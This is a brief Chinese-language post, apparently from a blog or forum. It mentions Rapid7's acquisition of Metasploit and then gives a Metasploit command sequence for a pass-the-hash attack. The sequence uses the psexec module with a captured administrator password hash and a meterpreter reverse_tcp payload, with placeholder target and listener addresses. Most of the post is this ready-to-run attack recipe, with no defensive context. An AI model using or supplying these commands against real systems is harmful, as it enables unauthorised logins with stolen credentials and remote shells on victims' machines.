其实Metasploit 早就被Rapid7收购了,好像没什么人知道,呵呵,Metasploit 专业版就是收购后发布出来的。
抓到管理员的密码hash根本不用破解,直接就可以登录。
use windows/smb/psexec
set SMBUser akast
set SMBPass 用户密码的hash值
set payload Windows/meterpreter/reverse_tcp
set rhost 333.333.333.333
set lhost 111.111.111.111
exploit